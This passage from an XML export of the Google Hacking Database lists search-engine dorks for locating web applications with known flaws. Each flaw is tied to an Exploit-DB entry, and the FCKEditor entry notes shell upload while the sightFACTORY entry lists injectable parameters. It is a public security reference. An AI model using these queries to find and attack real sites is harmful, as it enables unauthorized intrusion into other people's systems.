<querystring>https://www.google.com/search?biw=1280&amp;bih=685&amp;q=%22hlstats.php%3Fmode%3Ddailyawardinfo%26award%3D%22+hlstatsx</querystring>
<edb>https://www.exploit-db.com/exploits/10850</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>858</id>
<link>https://www.exploit-db.com/ghdb/858</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;IceWarp Web Mail 5.3.0&quot; &quot;Powered by IceWarp&quot;</shortDescription>
<textualDescription>IceWarp Web Mail 5.3.0Multiple cross-site scripting and HTML injection vulnerabilities.http://www.securityfocus.com/bid/12396/</textualDescription>
<query>&quot;IceWarp Web Mail 5.3.0&quot; &quot;Powered by IceWarp&quot;</query>
<querystring>https://www.google.com/search?q=%22IceWarp+Web+Mail+5.3.0%22+%22Powered+by+IceWarp%22</querystring>
<edb></edb>
<date>2005-02-07</date>
<author>anonymous</author>
</entry>
<entry>
<id>609</id>
<link>https://www.exploit-db.com/ghdb/609</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Ideal BB Version: 0.1&quot; -idealbb.com</shortDescription>
<textualDescription>Ideal BB has been a popular choice for powering web based bulletin boards and we are now proud to introduce our next generation bulletin board Ideal BB.NET. Ideal Science IdealBB is reported prone to multiple unspecified input validation vulnerabilities. These issues result from insufficient sanitization of user-supplied data. Securityfocus currently has 3 reports idealBB.</textualDescription>
<query>&quot;Ideal BB Version: 0.1&quot; -idealbb.com</query>
<querystring>https://www.google.com/search?q=%22Ideal+BB+Version%3A+0.1%22+-idealbb.com&amp;btnG=Google-Suche</querystring>
<edb></edb>
<date>2004-10-21</date>
<author>anonymous</author>
</entry>
<entry>
<id>1949</id>
<link>https://www.exploit-db.com/ghdb/1949</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;inc_webblogmanager.asp&quot;</shortDescription>
<textualDescription>DMXReady Registration Manager 1.1 Arbitrary File Upload Vulnerability - CVE: 2009-2238: https://www.exploit-db.com/exploits/8749</textualDescription>
<query>&quot;inc_webblogmanager.asp&quot;</query>
<querystring>https://www.google.com/search?q=%22inc_webblogmanager.asp%22</querystring>
<edb>https://www.exploit-db.com/exploits/8749</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>6282</id>
<link>https://www.exploit-db.com/ghdb/6282</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;index of&quot; &quot;plugins/wp-rocket&quot;</shortDescription>
<textualDescription>Google Dork: &quot;index of&quot; &quot;plugins/wp-rocket&quot;
Category: Advisories and Vulnerabilities
Author: Prashant Sharma
LinkedIn: https://www.linkedin.com/in/prashantique/
</textualDescription>
<query>&quot;index of&quot; &quot;plugins/wp-rocket&quot;</query>
<querystring>https://www.google.com/search?q=&quot;index of&quot; &quot;plugins/wp-rocket&quot;</querystring>
<edb></edb>
<date>2020-06-15</date>
<author>Prashant Sharma</author>
</entry>
<entry>
<id>4307</id>
<link>https://www.exploit-db.com/ghdb/4307</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;index of&quot; bigdump.php</shortDescription>
<textualDescription>Search for BigDump: Staggered MySQL Dump Importer file
- Arbitrary Upload
- Juicy info/passwords
- Deleting files
- MySQL injection</textualDescription>
<query>&quot;index of&quot; bigdump.php</query>
<querystring>https://www.google.com/search?q=&quot;index of&quot; bigdump.php</querystring>
<edb></edb>
<date>2016-07-04</date>
<author>anonymous</author>
</entry>
<entry>
<id>1300</id>
<link>https://www.exploit-db.com/ghdb/1300</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;index of&quot; intext:fckeditor inurl:fckeditor</shortDescription>
<textualDescription>&quot;index of&quot; intext:fckeditor inurl:fckeditor this dork is for FCKEditor scriptthrough editor/filemanager/browser/default/connectors/connector.php script a user can upload malicious contempt on target machine including php code and launch commands... however if you do not succeed to execute the shell, FCKEditor is integrated in a lot of applications, you can check for a local inclusion issue inside of them... this tool make the dirty work for 2.0 - 2.2 versions: http://retrogod.altervista.org/fckeditor_22_xpl.html</textualDescription>
<query>&quot;index of&quot; intext:fckeditor inurl:fckeditor</query>
<querystring>https://www.google.com/search?hl=it&amp;q=%22index+of%22+intext%3Afckeditor+inurl%3Afckeditor+&amp;btnG=Cerca+con+Google</querystring>
<edb></edb>
<date>2006-02-09</date>
<author>anonymous</author>
</entry>
<entry>
<id>2742</id>
<link>https://www.exploit-db.com/ghdb/2742</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;index.php?id_menu=&quot; CMScontrol</shortDescription>
<textualDescription>CMScontrol (Content Management Portal Solutions) Sql Injection - CVE: 2009-3326: https://www.exploit-db.com/exploits/9727</textualDescription>
<query>&quot;index.php?id_menu=&quot; CMScontrol</query>
<querystring>https://www.google.com/search?q=%22index.php%3Fid_menu%3D%22+CMScontrol</querystring>
<edb>https://www.exploit-db.com/exploits/9727</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2778</id>
<link>https://www.exploit-db.com/ghdb/2778</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;index.php?option=com_chronoconnectivity&quot; / &quot;com_chronoconnectivity&quot;</shortDescription>
<textualDescription>Joomla Component ChronoConnectivity: https://www.exploit-db.com/exploits/12842</textualDescription>
<query>&quot;index.php?option=com_chronoconnectivity&quot; / &quot;com_chronoconnectivity</query>
<querystring>https://www.google.com/search?q=%22index.php%3Foption%3Dcom_chronoconnectivity%22+/+%22com_chronoconnectivity</querystring>
<edb>https://www.exploit-db.com/exploits/12842</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2739</id>
<link>https://www.exploit-db.com/ghdb/2739</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;index.php?option=com_chronocontact&quot; / &quot;com_chronocontact&quot;</shortDescription>
<textualDescription>Joomla Component ChronoForms (com_chronocontact): https://www.exploit-db.com/exploits/12843</textualDescription>
<query>&quot;index.php?option=com_chronocontact&quot; / &quot;com_chronocontact&quot;</query>
<querystring>https://www.google.com/search?q=%22index.php%3Foption%3Dcom_chronocontact%22+/+%22com_chronocontact%22</querystring>
<edb>https://www.exploit-db.com/exploits/12843</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3051</id>
<link>https://www.exploit-db.com/ghdb/3051</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;index.php?option=com_expose&quot;</shortDescription>
<textualDescription>Joomla Component Expose RC35 Remote File Upload Vulnerability - CVE: 2007-3932: https://www.exploit-db.com/exploits/4194</textualDescription>
<query>&quot;index.php?option=com_expose&quot;</query>
<querystring>https://www.google.com/search?q=%22index.php%3Foption%3Dcom_expose%22</querystring>
<edb>https://www.exploit-db.com/exploits/4194</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2141</id>
<link>https://www.exploit-db.com/ghdb/2141</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;index.php?option=com_mdigg&quot;</shortDescription>
<textualDescription>Joomla Component com_mdigg SQL Injection Vulnerability: https://www.exploit-db.com/exploits/10847</textualDescription>
<query>&quot;index.php?option=com_mdigg&quot;</query>
<querystring>https://www.google.com/search?q=%22index.php%3Foption%3Dcom_mdigg%22</querystring>
<edb>https://www.exploit-db.com/exploits/10847</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3218</id>
<link>https://www.exploit-db.com/ghdb/3218</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;index.php?option=com_news_portal&quot; or &quot;Powered by iJoomla News Portal&quot;</shortDescription>
<textualDescription>iJoomla News Portal (Itemid) Remote SQL Injection - CVE: 2008-2676: https://www.exploit-db.com/exploits/5761</textualDescription>
<query>&quot;index.php?option=com_news_portal&quot; or &quot;Powered by iJoomla News Portal&quot;</query>
<querystring>https://www.google.com/search?q=%22index.php%3Foption%3Dcom_news_portal%22+or+%22Powered+by+iJoomla+News+Portal%22</querystring>
<edb>https://www.exploit-db.com/exploits/5761</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2986</id>
<link>https://www.exploit-db.com/ghdb/2986</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;index.php?option=com_qcontacts&quot;</shortDescription>
<textualDescription>Joomla Component QContacts (com_qcontacts) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/14350</textualDescription>
<query>&quot;index.php?option=com_qcontacts&quot;</query>
<querystring>https://www.google.com/search?q=%22index.php%3Foption%3Dcom_qcontacts%22</querystring>
<edb>https://www.exploit-db.com/exploits/14350</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3204</id>
<link>https://www.exploit-db.com/ghdb/3204</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;index.php?option=com_resman&quot;</shortDescription>
<textualDescription>Joomla Component Car Manager 1.1 Remote SQL Injection - CVE: 2007-1704: https://www.exploit-db.com/exploits/3564</textualDescription>
<query>&quot;index.php?option=com_resman&quot;</query>
<querystring>https://www.google.com/search?q=%22index.php%3Foption%3Dcom_resman%22</querystring>
<edb>https://www.exploit-db.com/exploits/3564</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3208</id>
<link>https://www.exploit-db.com/ghdb/3208</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;index.php?option=com_rwcards&quot;</shortDescription>
<textualDescription>Joomla Component RWCards 2.4.3 Remote SQL Injection - CVE: 2007-1703: https://www.exploit-db.com/exploits/3565</textualDescription>
<query>&quot;index.php?option=com_rwcards&quot;</query>
<querystring>https://www.google.com/search?q=%22index.php%3Foption%3Dcom_rwcards%22</querystring>
<edb>https://www.exploit-db.com/exploits/3565</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2845</id>
<link>https://www.exploit-db.com/ghdb/2845</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;index.php?option=com_sef&quot; / &quot;com_sef&quot;</shortDescription>
<textualDescription>Joomla Component Sef (com_sef) - LFI Vulnerability: https://www.exploit-db.com/exploits/14213</textualDescription>
<query>&quot;index.php?option=com_sef&quot; / &quot;com_sef&quot;</query>
<querystring>https://www.google.com/search?q=%22index.php%3Foption%3Dcom_sef%22+%2F+%22com_sef%22</querystring>
<edb>https://www.exploit-db.com/exploits/14213</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2769</id>
<link>https://www.exploit-db.com/ghdb/2769</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;index.php?option=com_seyret&quot; / &quot;com_seyret&quot;</shortDescription>
<textualDescription>Joomla Component Seyret (com_seyret) - Local File Inclusion Vulnerability: https://www.exploit-db.com/exploits/14183</textualDescription>
<query>&quot;index.php?option=com_seyret&quot; / &quot;com_seyret&quot;</query>
<querystring>https://www.google.com/search?q=%22index.php%3Foption%3Dcom_seyret%22+/+%22com_seyret%22</querystring>
<edb>https://www.exploit-db.com/exploits/14183</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2510</id>
<link>https://www.exploit-db.com/ghdb/2510</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;index.php?sbjoke_id=&quot;</shortDescription>
<textualDescription>Jokes &amp; Funny Pics Script (sb_jokeid) SQL Injection Vulnerability - CVE: 2008-2874: https://www.exploit-db.com/exploits/5934</textualDescription>
<query>&quot;index.php?sbjoke_id=&quot;</query>
<querystring>https://www.google.com/search?q=%22index.php%3Fsbjoke_id%3D%22</querystring>
<edb>https://www.exploit-db.com/exploits/5934</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2549</id>
<link>https://www.exploit-db.com/ghdb/2549</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;index.php?section=post_upload&quot; </shortDescription>
<textualDescription>DDL-Speed Script (acp/backup) Admin Backup Bypass Vulnerability: https://www.exploit-db.com/exploits/7629</textualDescription>
<query>&quot;index.php?section=post_upload&quot;</query>
<querystring>https://www.google.com/search?q=%22index.php%3Fsection%3Dpost_upload%22</querystring>
<edb>https://www.exploit-db.com/exploits/7629</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1616</id>
<link>https://www.exploit-db.com/ghdb/1616</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Instant Free File Uploader&quot;</shortDescription>
<textualDescription>Uploaderr 1.0 - File Hosting Script Shell Upload Vulnerability: https://www.exploit-db.com/exploits/10241</textualDescription>
<query>&quot;Instant Free File Uploader&quot;</query>
<querystring>https://www.google.com/search?q=%22Instant+Free+File+Uploader%22</querystring>
<edb>https://www.exploit-db.com/exploits/10241</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2645</id>
<link>https://www.exploit-db.com/ghdb/2645</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Internet Photoshow - Slideshow&quot;</shortDescription>
<textualDescription>Internet Photoshow (Special Edition) Insecure Cookie Handling Vuln - CVE: 2008-2282: https://www.exploit-db.com/exploits/5617</textualDescription>
<query>&quot;Internet Photoshow - Slideshow&quot;</query>
<querystring>https://www.google.com/search?q=%22Internet+Photoshow+-+Slideshow%22</querystring>
<edb>https://www.exploit-db.com/exploits/5617</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1907</id>
<link>https://www.exploit-db.com/ghdb/1907</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;intext:Warning: passthru()&quot; &quot;inurl:view=help&quot;</shortDescription>
<textualDescription>PTC Site's RCE/XSS Vulnerability: https://www.exploit-db.com/exploits/12808</textualDescription>
<query>&quot;intext:Warning: passthru()&quot; &quot;inurl:view=help&quot;</query>
<querystring>https://www.google.com/search?q=%22intext:Warning:+passthru()%22+%22inurl:view%3Dhelp%22</querystring>
<edb>https://www.exploit-db.com/exploits/12808</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1737</id>
<link>https://www.exploit-db.com/ghdb/1737</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;inurl:/admin/&quot; &quot;ImageVue&quot;</shortDescription>
<textualDescription>ImageVue 2.0 Remote Admin Login: https://www.exploit-db.com/exploits/10630</textualDescription>
<query>&quot;inurl:/admin/&quot; &quot;ImageVue&quot;</query>
<querystring>https://www.google.com/search?q=%22inurl:/admin/%22+%22ImageVue%22</querystring>
<edb>https://www.exploit-db.com/exploits/10630</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>626</id>
<link>https://www.exploit-db.com/ghdb/626</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;inurl:/site/articles.asp?idcategory=&quot;</shortDescription>
<textualDescription>Dwc_Articles, is an ASP application designed to add Featured, Recent and Popular News through an easy to use administration area. Other features: Design Packages, Add, Modify, Deactive through HTML/Wysiwyg Editor, Upload, categories, Multiple Users and more.Nearly all scripts suffer from possible sql injections. This may lead an attacker to change websites content or even worse, a login as an admin.vulnerable:</textualDescription>
<query>&quot;inurl:/site/articles.asp?idcategory=&quot;</query>
<querystring>https://www.google.com/search?q=%22inurl%3A%2Fsite%2Farticles.asp%3Fidcategory%3D%22+&amp;btnG=Google+Search</querystring>
<edb></edb>
<date>2004-10-26</date>
<author>anonymous</author>
</entry>
<entry>
<id>3677</id>
<link>https://www.exploit-db.com/ghdb/3677</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;inurl:cultbooking.php&quot;</shortDescription>
<textualDescription>CultBooking Multiple Vulnerabilities: https://www.exploit-db.com/exploits/16028/</textualDescription>
<query>&quot;inurl:cultbooking.php&quot;</query>
<querystring>https://www.google.com/search?q=&quot;inurl:cultbooking.php&quot;</querystring>
<edb>https://www.exploit-db.com/exploits/16028</edb>
<date>2011-01-22</date>
<author>anonymous</author>
</entry>
<entry>
<id>3513</id>
<link>https://www.exploit-db.com/ghdb/3513</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;is a product of Lussumo&quot;</shortDescription>
<textualDescription>Vanilla 1.1.3 Remote Blind SQL Injection - CVE: 2007-5643: https://www.exploit-db.com/exploits/4548</textualDescription>
<query>&quot;is a product of Lussumo&quot;</query>
<querystring>https://www.google.com/search?q=%22is+a+product+of+Lussumo%22</querystring>
<edb>https://www.exploit-db.com/exploits/4548</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3500</id>
<link>https://www.exploit-db.com/ghdb/3500</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;is proudly powered by WordPress&quot;</shortDescription>
<textualDescription>Wordpress 2.0.6 wp-trackback.php Remote SQL Injection - CVE: 2007-0233: https://www.exploit-db.com/exploits/3109</textualDescription>
<query>&quot;is proudly powered by WordPress&quot;</query>
<querystring>https://www.google.com/search?q=%22is+proudly+powered+by+WordPress%22</querystring>
<edb>https://www.exploit-db.com/exploits/3109</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2276</id>
<link>https://www.exploit-db.com/ghdb/2276</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Jax Calendar v1.34 by Jack (tR), www.jtr.de/scripting/php&quot;</shortDescription>
<textualDescription>Jax Calendar 1.34 Remote Admin Access: https://www.exploit-db.com/exploits/10835</textualDescription>
<query>&quot;Jax Calendar v1.34 by Jack (tR), www.jtr.de/scripting/php&quot;</query>
<querystring>https://www.google.com/search?biw=1280&amp;bih=685&amp;q=+%22Jax+Calendar+v1.34+by+Jack+(tR),+www.jtr.de/scripting/php%22</querystring>
<edb>https://www.exploit-db.com/exploits/10835</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2138</id>
<link>https://www.exploit-db.com/ghdb/2138</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Jevonweb Guestbook&quot;</shortDescription>
<textualDescription>Jevonweb Guestbook Remote Admin Access: https://www.exploit-db.com/exploits/10665</textualDescription>
<query>&quot;Jevonweb Guestbook&quot;</query>
<querystring>https://www.google.com/search?q=%22Jevonweb+Guestbook%22</querystring>
<edb>https://www.exploit-db.com/exploits/10665</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3233</id>
<link>https://www.exploit-db.com/ghdb/3233</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Jinzora Media Jukebox&quot;</shortDescription>
<textualDescription>Jinzora 2.7 (include_path) Multiple Remote File Include Vulnerabilities - CVE: 2006-6770: https://www.exploit-db.com/exploits/3003</textualDescription>
<query>&quot;Jinzora Media Jukebox&quot;</query>
<querystring>https://www.google.com/search?q=%22Jinzora+Media+Jukebox%22</querystring>
<edb>https://www.exploit-db.com/exploits/3003</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3054</id>
<link>https://www.exploit-db.com/ghdb/3054</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;kims Q - Administrator Login Mode&quot;</shortDescription>
<textualDescription>KimsQ 040109 Multiple Remote File Include Vulnerability: https://www.exploit-db.com/exploits/11960</textualDescription>
<query>&quot;kims Q - Administrator Login Mode&quot;</query>
<querystring>https://www.google.com/search?q=%22kims+Q+-+Administrator+Login+Mode%22</querystring>
<edb>https://www.exploit-db.com/exploits/11960</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3248</id>
<link>https://www.exploit-db.com/ghdb/3248</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Ladder Scripts by http://www.mygamingladder.com&quot;</shortDescription>
<textualDescription>My Gaming Ladder Combo System 7.0 Remote Code Execution - CVE: 2006-2002: https://www.exploit-db.com/exploits/1707</textualDescription>
<query>&quot;Ladder Scripts by http://www.mygamingladder.com&quot;</query>
<querystring>https://www.google.com/search?q=%22Ladder+Scripts+by+http://www.mygamingladder.com%22</querystring>
<edb>https://www.exploit-db.com/exploits/1707</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2623</id>
<link>https://www.exploit-db.com/ghdb/2623</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Ladder Scripts by&quot;</shortDescription>
<textualDescription>My Gaming Ladder 7.5 (ladderid) SQL Injection Vulnerability - CVE: 2008-1791: https://www.exploit-db.com/exploits/5401</textualDescription>
<query>&quot;Ladder Scripts by&quot;</query>
<querystring>https://www.google.com/search?q=%22Ladder+Scripts+by%22</querystring>
<edb>https://www.exploit-db.com/exploits/5401</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2065</id>
<link>https://www.exploit-db.com/ghdb/2065</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Liberum Help Desk, Copyright (C) 2001 Doug Luxem&quot;</shortDescription>
<textualDescription>Liberum Help Desk 0.97.3 (SQL/DD) Remote Vulnerabilities - CVE: 2008-6057: https://www.exploit-db.com/exploits/7493</textualDescription>
<query>&quot;Liberum Help Desk, Copyright (C) 2001 Doug Luxem&quot;</query>
<querystring>https://www.google.com/search?q=%22Liberum+Help+Desk,+Copyright+(C)+2001+Doug+Luxem%22</querystring>
<edb>https://www.exploit-db.com/exploits/7493</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1669</id>
<link>https://www.exploit-db.com/ghdb/1669</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Liberum Help Desk, Copyright (C) 2001 Doug Luxem. Please view the license</shortDescription>
<textualDescription>Liberum Help Desk 0.97.3 (details.asp) SQL Injection Vulnerability - CVE: 2006-6160: https://www.exploit-db.com/exploits/2846</textualDescription>
<query>&quot;Liberum Help Desk, Copyright (C) 2001 Doug Luxem. Please view the license</query>
<querystring>https://www.google.com/search?q=%22Liberum+Help+Desk,+Copyright+(C)+2001+Doug+Luxem.+Please+view+the+license</querystring>
<edb>https://www.exploit-db.com/exploits/2846</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3545</id>
<link>https://www.exploit-db.com/ghdb/3545</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;LinPHA Version 1.3.x&quot; or &quot;The LinPHA developers&quot;</shortDescription>
<textualDescription>LinPHA 1.3.1 (new_images.php) Remote Blind SQL Injection - CVE: 2007-4053: https://www.exploit-db.com/exploits/4242/</textualDescription>
<query>&quot;LinPHA Version 1.3.x&quot; or &quot;The LinPHA developers&quot;</query>
<querystring>https://www.google.com/search?q=%22LinPHA+Version+1.3.x%22+or+%22The+LinPHA+developers%22</querystring>
<edb>https://www.exploit-db.com/exploits/4242</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>6104</id>
<link>https://www.exploit-db.com/ghdb/6104</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;LMS v3.0 - Xerone IT&quot;</shortDescription>
<textualDescription># Google Dork: &quot;LMS v3.0 - Xerone IT&quot;
# Xeroneit Library Management System 3.0 - 'category' SQL Injection. This
dork is linked to the following existing exploit:
https://www.exploit-db.com/exploits/48328
# Date: 20/05/2020
# Author: Alexandros Pappas
</textualDescription>
<query>&quot;LMS v3.0 - Xerone IT&quot;</query>
<querystring>https://www.google.com/search?q=&quot;LMS v3.0 - Xerone IT&quot;</querystring>
<edb></edb>
<date>2020-05-20</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>6761</id>
<link>https://www.exploit-db.com/ghdb/6761</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;machform&quot; inurl:&quot;view.php&quot;</shortDescription>
<textualDescription># Google Dork: &quot;machform&quot; inurl:&quot;view.php&quot;
# MachForm &lt; 4.2.3 - SQL Injection / Path Traversal / Upload
# Bypass. CVE-2018-6409, CVE-2018-6410, CVE-2018-6411.
# https://www.exploit-db.com/exploits/44804
# Date: 21/1/2021
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>&quot;machform&quot; inurl:&quot;view.php&quot;</query>
<querystring>https://www.google.com/search?q=&quot;machform&quot; inurl:&quot;view.php&quot;</querystring>
<edb></edb>
<date>2021-01-22</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>3687</id>
<link>https://www.exploit-db.com/ghdb/3687</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;made visual by sightFACTORY&quot;</shortDescription>
<textualDescription>Author : eXeSoul [#] http://server/accommodations.php?contentid=[sqli] [#] http://server/chamber_business.php?mid=[sqli] [#] http://server/work.php?mid=[sqli] [#] http://server/members.php?id=[SQLi]</textualDescription>
<query>&quot;made visual by sightFACTORY&quot;</query>
<querystring>https://www.google.com/search?q=%22made+visual+by+sightFACTORY%22</querystring>
<edb></edb>
<date>2011-02-23</date>
<author>anonymous</author>
</entry>
<entry>
<id>1134</id>
<link>https://www.exploit-db.com/ghdb/1134</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Maintained with Subscribe Me 2.044.09p&quot;+&quot;Professional&quot; inurl:&quot;s.pl&quot;</shortDescription>
<textualDescription>subscribe Me Pro 2.0.44.09p is prone to a directory traversal vulnerability. This is due to a lack of proper sanitization of user-supplied input. Exploitation of this vulnerability could lead to a loss of confidentiality as arbitrary files are disclosed to an attacker. Information obtained through this attack may aid in further attacks against the underlying system.http://www.securityfocus.com/bid/14817/exploit</textualDescription>
<query>&quot;Maintained with Subscribe Me 2.044.09p&quot;+&quot;Professional&quot; inurl:&quot;s.pl&quot;</query>
<querystring>https://www.google.com/search?num=100&amp;q=%22Maintained+with+Subscribe+Me+2.044.09p%22%2B%22Professional%22+inurl%3A%22s.pl%22+</querystring>
<edb></edb>
<date>2005-09-25</date>
<author>anonymous</author>
</entry>
<entry>
<id>2599</id>
<link>https://www.exploit-db.com/ghdb/2599</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;MangoBery 1.0 Alpha&quot;</shortDescription>
<textualDescription>MangoBery CMS 0.5.5 (quotes.php) Remote File Inclusion Vulnerability - CVE: 2007-1837: https://www.exploit-db.com/exploits/3598</textualDescription>
<query>&quot;MangoBery 1.0 Alpha&quot;</query>
<querystring>https://www.google.com/search?q=%22MangoBery+1.0+Alpha%22</querystring>
<edb>https://www.exploit-db.com/exploits/3598</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1850</id>
<link>https://www.exploit-db.com/ghdb/1850</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Marketplace Version 1.1.1&quot;</shortDescription>
<textualDescription>Joomla Component Marketplace 1.1.1 SQL Injection Vulnerability - CVE: 2008-0689: https://www.exploit-db.com/exploits/5055</textualDescription>
<query>&quot;Marketplace Version 1.1.1&quot;</query>
<querystring>https://www.google.com/search?q=%22Marketplace+Version+1.1.1%22</querystring>
<edb>https://www.exploit-db.com/exploits/5055</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2052</id>
<link>https://www.exploit-db.com/ghdb/2052</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Members Statistics&quot; +&quot;Total Members&quot; +&quot;Guests Online&quot;</shortDescription>
<textualDescription>AR Memberscript (usercp_menu.php) Remote File Include Vulnerability - CVE: 2006-6590: https://www.exploit-db.com/exploits/2931</textualDescription>
<query>&quot;Members Statistics&quot; +&quot;Total Members&quot; +&quot;Guests Online&quot;</query>
<querystring>https://www.google.com/search?q=%22Members+Statistics%22+%2B%22Total+Members%22+%2B%22Guests+Online%22</querystring>
<edb>https://www.exploit-db.com/exploits/2931</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2409</id>
<link>https://www.exploit-db.com/ghdb/2409</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;MidiCart PHP Database Management&quot;</shortDescription>
<textualDescription>MidiCart PHP,ASP Shell Upload Vulnerability: https://www.exploit-db.com/exploits/12636</textualDescription>
<query>&quot;MidiCart PHP Database Management&quot;</query>
<querystring>https://www.google.com/search?q=%22MidiCart+PHP+Database+Management%22</querystring>
<edb>https://www.exploit-db.com/exploits/12636</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1130</id>
<link>https://www.exploit-db.com/ghdb/1130</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Mimicboard2 086&quot;+&quot;2000 Nobutaka Makino&quot;+&quot;password&quot;+&quot;message&quot; inurl:page=1</shortDescription>
<textualDescription>Mimicboard2 is prone to multiple HTML injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content.</textualDescription>
<query>&quot;Mimicboard2 086&quot;+&quot;2000 Nobutaka Makino&quot;+&quot;password&quot;+&quot;message&quot; inurl:page=1</query>
<querystring>https://www.google.com/search?safe=off&amp;c2coff=1&amp;q=%22Mimicboard2+086%22%2B%222000+Nobutaka+Makino%22%2B%22password%22%2B%22message%22+inurl%3Apage%3D1</querystring>
<edb></edb>
<date>2005-09-23</date>
<author>anonymous</author>
</entry>
<entry>
<id>1869</id>
<link>https://www.exploit-db.com/ghdb/1869</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;mirco blogging&quot;</shortDescription>
<textualDescription>x10 mirco blogging V121 SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12042</textualDescription>
<query>&quot;mirco blogging&quot;</query>
<querystring>https://www.google.com/search?q=%22mirco+blogging%22</querystring>
<edb>https://www.exploit-db.com/exploits/12042</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1956</id>
<link>https://www.exploit-db.com/ghdb/1956</link>
